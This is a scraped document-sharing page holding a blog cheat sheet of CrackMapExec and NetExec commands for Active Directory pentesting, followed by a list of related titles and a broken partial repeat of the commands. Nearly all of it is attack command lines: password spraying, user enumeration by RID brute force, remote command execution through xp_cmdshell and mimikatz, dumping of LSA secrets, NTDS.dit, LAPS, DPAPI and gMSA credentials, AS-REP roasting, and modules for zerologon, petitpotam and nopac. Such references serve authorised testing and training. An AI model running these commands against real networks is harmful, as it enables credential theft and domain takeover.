0% found this document useful (0 votes)

813 views

CrackMapExec and NetExec Cheat Sheet

The document provides a cheat sheet of useful commands for CrackMapExec and NetExec for pentesting, including commands for enumeration, password spraying, dumping secrets, and useful modules.

Uploaded by

setyahangga3

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

813 views

CrackMapExec and NetExec Cheat Sheet

The document provides a cheat sheet of useful commands for CrackMapExec and NetExec for pentesting, including commands for enumeration, password spraying, dumping secrets, and useful modules.

Uploaded by

setyahangga3

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 10

CrackMapExec and NetExec Cheat Sheet

seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/

A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different
services to use during Pentesting

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

1/10
NetExec: https://github.com/Pennyw0rth/NetExec

Installation: https://www.netexec.wiki/getting-started/installation

The same commands for crackmapexec would also work for NetExec

Other names: cme, nxc

Enumeration

Initial Enumeration
bash

crackmapexec smb
target

Null Authentication
bash

crackmapexec smb target -u ''

-p ''

Guest Authentication
bash

crackmapexec smb target -u 'guest'

-p ''

List Shares
bash

crackmapexec smb target -u '' -p '' --

2/10
bash

crackmapexec smb target -u username -p password --

List Usernames
bash

crackmapexec smb target -u '' -p '' --

users

bash

crackmapexec smb target -u '' -p '' --rid-

brute

bash

crackmapexec smb target -u username -p password --

users

Local Authentication
bash

crackmapexec smb target -u username -p password --

local-auth

Using Kerberos
bash

crackmapexec smb target -u username -p

password -k

Check for hosts that have SMB signing disabled

3/10
bash

crackmapexec smb target(s) --gen-relay-list

relay.txt

Spraying

Password Spray
bash

crackmapexec smb target -u users.txt -p password --continue-on-

success

bash

crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-

success

bash

crackmapexec ssh target(s) -u username -p password --continue-on-

success

SMB

All In One
bash

crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --

rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

4/10
bash

crackmapexec smb target -u username -p password -M

spider_plus

bash

crackmapexec smb target -u username -p password -M spider_plus -o

READ_ONLY=false

Dump a specific file

bash

crackmapexec smb target -u username -p password -k --get-file target_file output_file --share

sharename

LDAP

Enumerate users using ldap

bash

crackmapexec ldap target -u '' -p '' --

users

All In One
bash

crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-

required --admin-count --users --groups

WMI

5/10
bash

cme wmi target(s) -d domain -u username -p password [-H hash] -M

mimikatz

MSSQL

Authentication
bash

crackmapexec mssql target -u username -p

password

Execute commands using xp_cmdshell

-X for powershell and -x for cmd

bash

crackmapexec mssql target -u username -p password -x

command_to_execute

Get a file
bash

crackmapexec mssql target -u username -p password --get-file output_file

target_file

Secrets Dump

Dump LSA secrets

bash

crackmapexec smb target -u username -p password --local-auth

--lsa

6/10
gMSA
bash

crackmapexec ldap target -u username -p password --gmsa-convert-

id id

bash

crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa

gmsa_account

Group Policy Preferences

bash

crackmapexec smb target -u username -p password -M

gpp_password

Dump LAPS password

bash

crackmapexec smb target -u username -p password -

-laps

Dump dpapi credentials

bash

crackmapexec smb target -u username -p password --laps --

dpapi

Dump NTDS.dit

7/10
bash

crackmapexec smb target -u username -p password -

-ntds

Asreproast
bash

crackmapexec ldap target -u username -p password --asreproast

asrep.txt

Bloodhound
bash

crackmapexec ldap target -u username -p password --bloodhound -ns ip --

collection All

Useful Modules

Webdav
Checks whether the WebClient service is running on the target

bash

crackmapexec smb ip -u username -p password -M

webdav

Veeam
Extracts credentials from local Veeam SQL Database

bash

crackmapexec smb target -u username -p password -M

veeam

8/10
slinky
Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in
all shares with write permissions

bash

crackmapexec smb ip -u username -p password -M

slinky

ntdsutil
Dump NTDS with ntdsutil

bash

crackmapexec smb ip -u username -p password -M

ntdsutil

ldap-checker
Checks whether LDAP signing and binding are required and/or enforced

bash

cme ldap target -u username -p password -M ldap-

checker

bash

crackmapexec smb target -u username -p password -M

zerologon

bash

crackmapexec smb target -u username -p password -M

petitpotam

9/10
bash

crackmapexec smb target -u username -p password -M

nopac

Check the MachineAccountQuota

bash

crackmapexec ldap target -u username -p password -

M maq

ADCS Enumeration
bash

crackmapexec ldap target -u username -p password -M

adcs

Author: serioton
Link: https://seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
cheatsheet

10/10

FCP_FGT_AD-7.4
No ratings yet
FCP_FGT_AD-7.4
37 pages
ANSI_X9.24_3_2017
No ratings yet
ANSI_X9.24_3_2017
83 pages
Comptia Security + (Syo-601 & Syo - 701) Exam Study Guide
No ratings yet
Comptia Security + (Syo-601 & Syo - 701) Exam Study Guide
152 pages
Greg Schardt - Hacking Case2
No ratings yet
Greg Schardt - Hacking Case2
27 pages
?jira Vulnerability Checklist?
No ratings yet
?jira Vulnerability Checklist?
5 pages
2000+ Top XSS Reports From HackerOne
No ratings yet
2000+ Top XSS Reports From HackerOne
91 pages
Alert Analysis L1 External
No ratings yet
Alert Analysis L1 External
7 pages
Oid
No ratings yet
Oid
36 pages
EXAClusterOS-6 0 6
No ratings yet
EXAClusterOS-6 0 6
138 pages
Nessus Cheat Sheat
100% (12)
Nessus Cheat Sheat
1 page
Python-Nmap - Nmap From Python
No ratings yet
Python-Nmap - Nmap From Python
7 pages
An Introduction To Run-Levels
100% (1)
An Introduction To Run-Levels
17 pages
my notes
No ratings yet
my notes
4 pages
Instant Access to Hash Crack Password Cracking Manual 2nd Edition Joshua Picolet ebook Full Chapters
100% (1)
Instant Access to Hash Crack Password Cracking Manual 2nd Edition Joshua Picolet ebook Full Chapters
67 pages
FTP Cheat Sheet
No ratings yet
FTP Cheat Sheet
8 pages
Jhon - JTR Cheat Sheet
No ratings yet
Jhon - JTR Cheat Sheet
2 pages
Armitage Hacking Mode Easy
No ratings yet
Armitage Hacking Mode Easy
36 pages
Nikto Cheat Sheet: Scan Options Display Options
No ratings yet
Nikto Cheat Sheet: Scan Options Display Options
1 page
SSH Cheat Sheet
No ratings yet
SSH Cheat Sheet
1 page
Nmap Commands Cheat Sheet
100% (1)
Nmap Commands Cheat Sheet
1 page
Reverse Shell Cheat Sheet
0% (1)
Reverse Shell Cheat Sheet
16 pages
Nmap
No ratings yet
Nmap
8 pages
Pivot Cheat Sheet
No ratings yet
Pivot Cheat Sheet
2 pages
Red Teamer S Guide To Wi Fi Exploits 1719801009
No ratings yet
Red Teamer S Guide To Wi Fi Exploits 1719801009
31 pages
6.3.1.2 Packet Tracer Layer 2 Security
No ratings yet
6.3.1.2 Packet Tracer Layer 2 Security
4 pages
How To Install Lazy Script
50% (4)
How To Install Lazy Script
7 pages
SMB Relay Attacks and Active Directory - TCM Security
No ratings yet
SMB Relay Attacks and Active Directory - TCM Security
16 pages
Enumerating Esoteric Attack Surfaces by Jann Moon
No ratings yet
Enumerating Esoteric Attack Surfaces by Jann Moon
196 pages
Sysmon Cheatsheet Dark
No ratings yet
Sysmon Cheatsheet Dark
2 pages
Disk Group Privilege Escalation 1714302659
No ratings yet
Disk Group Privilege Escalation 1714302659
14 pages
13.3.2-Lab - Use-Ping-And-Traceroute-To-Test-Network-Connectivity - CESAR RIOS
No ratings yet
13.3.2-Lab - Use-Ping-And-Traceroute-To-Test-Network-Connectivity - CESAR RIOS
11 pages
MSRPC Pentesting Best Practices
No ratings yet
MSRPC Pentesting Best Practices
7 pages
Subdomain Enumeration Cheat Sheet: @yamakira
No ratings yet
Subdomain Enumeration Cheat Sheet: @yamakira
1 page
Tools_JohnTheRipper
No ratings yet
Tools_JohnTheRipper
43 pages
Comptia Security Sy0 501 Exam Objectives
No ratings yet
Comptia Security Sy0 501 Exam Objectives
20 pages
Netbios Hacking To Gain Access To Remote Computer
No ratings yet
Netbios Hacking To Gain Access To Remote Computer
2 pages
Airgeddon
No ratings yet
Airgeddon
30 pages
Linux Tools
No ratings yet
Linux Tools
8 pages
CEH11 Lab Manual Module 02 - Footprinting and Reconnaissance
No ratings yet
CEH11 Lab Manual Module 02 - Footprinting and Reconnaissance
179 pages
Windows Registry
No ratings yet
Windows Registry
31 pages
05. Windows Lateral Movement
No ratings yet
05. Windows Lateral Movement
93 pages
Pentest Command Tools Gpen Based Cheat Sheet
No ratings yet
Pentest Command Tools Gpen Based Cheat Sheet
10 pages
© 2019 Caendra Inc. - Hera For Waptxv2 - Xxe Labs
No ratings yet
© 2019 Caendra Inc. - Hera For Waptxv2 - Xxe Labs
16 pages
Unquoted Service Path
No ratings yet
Unquoted Service Path
12 pages
07. Kerberos Attacks
No ratings yet
07. Kerberos Attacks
125 pages
Lab - Exploring Endpoint Attacks: Requirements
No ratings yet
Lab - Exploring Endpoint Attacks: Requirements
16 pages
2.7.3 Lab Use Steganography To Hide Data Answer Key
No ratings yet
2.7.3 Lab Use Steganography To Hide Data Answer Key
3 pages
Kali Linux Reaver Setup Untuk Beginner
No ratings yet
Kali Linux Reaver Setup Untuk Beginner
2 pages
232 Pdfsam TCPIP Professional Reference Guide TQW Darksiderg
No ratings yet
232 Pdfsam TCPIP Professional Reference Guide TQW Darksiderg
11 pages
Os Command Injections eBook
No ratings yet
Os Command Injections eBook
21 pages
Wi-Fi 802.11 Standard Security
No ratings yet
Wi-Fi 802.11 Standard Security
22 pages
Packet or Network Sniffing
No ratings yet
Packet or Network Sniffing
56 pages
Basic Red Hat Linux
No ratings yet
Basic Red Hat Linux
5 pages
Nmap Cheat Sheet
No ratings yet
Nmap Cheat Sheet
8 pages
Optiplex 3000 Thinclient Technical Guidebook
No ratings yet
Optiplex 3000 Thinclient Technical Guidebook
27 pages
HiveNightmare PDF
No ratings yet
HiveNightmare PDF
9 pages
NeXpose User Guide
No ratings yet
NeXpose User Guide
76 pages
Linux Shell
No ratings yet
Linux Shell
14 pages
Crackmapexec Cheat Sheet
No ratings yet
Crackmapexec Cheat Sheet
13 pages
Post Exploit
No ratings yet
Post Exploit
22 pages
Using Crackmapexec Module Cheat Sheet
No ratings yet
Using Crackmapexec Module Cheat Sheet
12 pages
Post Exploitation Commands
No ratings yet
Post Exploitation Commands
14 pages
Red Team Manual - The Cheat Sheet (Version 4)
No ratings yet
Red Team Manual - The Cheat Sheet (Version 4)
28 pages
Command Description
100% (1)
Command Description
2 pages
A Little Guide To SMB Enumeration
No ratings yet
A Little Guide To SMB Enumeration
13 pages
Red Team Manual - The Cheat Sheet (Version 4)
No ratings yet
Red Team Manual - The Cheat Sheet (Version 4)
27 pages
Some More Examples GivenText 9 1 2023
No ratings yet
Some More Examples GivenText 9 1 2023
15 pages
JWT Hacking
No ratings yet
JWT Hacking
8 pages
Pwning The Domain DACL Abuse EBook
No ratings yet
Pwning The Domain DACL Abuse EBook
20 pages
Hacking LLM
No ratings yet
Hacking LLM
33 pages
My Darkest Desires Telegram OS
No ratings yet
My Darkest Desires Telegram OS
13 pages
Windows Privilege Escalation
No ratings yet
Windows Privilege Escalation
53 pages
The Top Hacker Methodologies & Tools Notes
No ratings yet
The Top Hacker Methodologies & Tools Notes
23 pages
XML External Entity XXE Attack 1704716540
No ratings yet
XML External Entity XXE Attack 1704716540
19 pages
Cross Site Scripting XSS Regex Bypass 1704538523
No ratings yet
Cross Site Scripting XSS Regex Bypass 1704538523
5 pages
HTTP Desync Attack
No ratings yet
HTTP Desync Attack
18 pages
IDOR
No ratings yet
IDOR
3 pages
?admin Panel Bypass Checklist?
100% (2)
?admin Panel Bypass Checklist?
3 pages
Pen Testing Tools Cheat Sheet
No ratings yet
Pen Testing Tools Cheat Sheet
39 pages
CORS Misconfiguration
No ratings yet
CORS Misconfiguration
14 pages
Guide To SSRF
No ratings yet
Guide To SSRF
6 pages
NTLM Abuse Methods
No ratings yet
NTLM Abuse Methods
22 pages
Web Logic Vulnerability
No ratings yet
Web Logic Vulnerability
57 pages
JSChecklist
No ratings yet
JSChecklist
2 pages
Business Logic Errors
No ratings yet
Business Logic Errors
8 pages
Rce Vulnerability Checklist
No ratings yet
Rce Vulnerability Checklist
2 pages
Information Disclosure Vulnerability
No ratings yet
Information Disclosure Vulnerability
8 pages
Public Information Gathering
100% (1)
Public Information Gathering
23 pages
Reconnaissance - Phase-2
No ratings yet
Reconnaissance - Phase-2
9 pages
Long Password DOS Attack
100% (1)
Long Password DOS Attack
6 pages
GitHub Dorking
No ratings yet
GitHub Dorking
42 pages
Abusing HTTP Hop-By-Hop Request Headers
No ratings yet
Abusing HTTP Hop-By-Hop Request Headers
4 pages
La Ciberseguridad Jor1 Ingles
No ratings yet
La Ciberseguridad Jor1 Ingles
9 pages
Ajayi Project Chapter 1 - 081850
No ratings yet
Ajayi Project Chapter 1 - 081850
17 pages
Ethical Hacking-vac
No ratings yet
Ethical Hacking-vac
21 pages
CCNP Security at TnLExperts PDF
No ratings yet
CCNP Security at TnLExperts PDF
17 pages
Sample Penetration Test Report
100% (1)
Sample Penetration Test Report
19 pages
Course Outline Uci 403
No ratings yet
Course Outline Uci 403
3 pages
Online Safety, Security, Ethics, and Etiquette: Email Spam
No ratings yet
Online Safety, Security, Ethics, and Etiquette: Email Spam
7 pages
Bug Bounty Hunting Syllabus
No ratings yet
Bug Bounty Hunting Syllabus
2 pages
Efficiency and Performance
No ratings yet
Efficiency and Performance
23 pages
SOGIS Agreed Cryptographic Mechanisms 1.2
No ratings yet
SOGIS Agreed Cryptographic Mechanisms 1.2
46 pages
13.4.2 Security and Encryption
No ratings yet
13.4.2 Security and Encryption
14 pages
Cyber Security Presentation
No ratings yet
Cyber Security Presentation
24 pages
Device Locks Unfortunately
No ratings yet
Device Locks Unfortunately
5 pages
Lab02 - Public-Key Cryptography
No ratings yet
Lab02 - Public-Key Cryptography
9 pages
Bbit 443
No ratings yet
Bbit 443
3 pages
cs707 Past Papers
No ratings yet
cs707 Past Papers
5 pages
Secure Website Standard IND 001
No ratings yet
Secure Website Standard IND 001
26 pages
100 Web Vulnerabilities
No ratings yet
100 Web Vulnerabilities
7 pages
MAXPHISHER
No ratings yet
MAXPHISHER
5 pages
Demonstrating A Robust Iso 27001 Information Security Management System With Identity Governance
No ratings yet
Demonstrating A Robust Iso 27001 Information Security Management System With Identity Governance
17 pages
كتاب الهكر الأخلاقي PDF
100% (3)
كتاب الهكر الأخلاقي PDF
188 pages
ISO 27005 Lista-Am+Vu PDF
No ratings yet
ISO 27005 Lista-Am+Vu PDF
6 pages
MUCLecture 2024 2539121
No ratings yet
MUCLecture 2024 2539121
15 pages
Computer Security Concepts (Inglés) (Artículo) Autor Zainab Abdullah Jasim
No ratings yet
Computer Security Concepts (Inglés) (Artículo) Autor Zainab Abdullah Jasim
7 pages
Sanfer Product Portfolio 2024
No ratings yet
Sanfer Product Portfolio 2024
4 pages
Cyber Security Chapter 2
No ratings yet
Cyber Security Chapter 2
18 pages

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.

CrackMapExec and NetExec Cheat Sheet

Uploaded by

CrackMapExec and NetExec Cheat Sheet

Uploaded by

CrackMapExec and NetExec Cheat Sheet

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

Other names: cme, nxc

crackmapexec smb target -u ''

crackmapexec smb target -u 'guest'

crackmapexec smb target -u '' -p '' --

crackmapexec smb target -u username -p password --

crackmapexec smb target -u '' -p '' --

crackmapexec smb target -u '' -p '' --rid-

crackmapexec smb target -u username -p password --

crackmapexec smb target -u username -p password --

crackmapexec smb target -u username -p

Check for hosts that have SMB signing disabled

crackmapexec smb target(s) --gen-relay-list

crackmapexec smb target -u users.txt -p password --continue-on-

crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-

crackmapexec ssh target(s) -u username -p password --continue-on-

crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --

crackmapexec smb target -u username -p password -M

crackmapexec smb target -u username -p password -M spider_plus -o

Dump a specific file

crackmapexec smb target -u username -p password -k --get-file target_file output_file --share

Enumerate users using ldap

crackmapexec ldap target -u '' -p '' --

crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-

cme wmi target(s) -d domain -u username -p password [-H hash] -M

crackmapexec mssql target -u username -p

Execute commands using xp_cmdshell

-X for powershell and -x for cmd

crackmapexec mssql target -u username -p password -x

crackmapexec mssql target -u username -p password --get-file output_file

Dump LSA secrets

crackmapexec smb target -u username -p password --local-auth

crackmapexec ldap target -u username -p password --gmsa-convert-

crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa

Group Policy Preferences

crackmapexec smb target -u username -p password -M

Dump LAPS password

crackmapexec smb target -u username -p password -

Dump dpapi credentials

crackmapexec smb target -u username -p password --laps --

crackmapexec smb target -u username -p password -

crackmapexec ldap target -u username -p password --asreproast

crackmapexec ldap target -u username -p password --bloodhound -ns ip --

crackmapexec smb ip -u username -p password -M

crackmapexec smb target -u username -p password -M

crackmapexec smb ip -u username -p password -M

crackmapexec smb ip -u username -p password -M

cme ldap target -u username -p password -M ldap-

crackmapexec smb target -u username -p password -M

crackmapexec smb target -u username -p password -M

crackmapexec smb target -u username -p password -M

Check the MachineAccountQuota

crackmapexec ldap target -u username -p password -

crackmapexec ldap target -u username -p password -M

You might also like

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.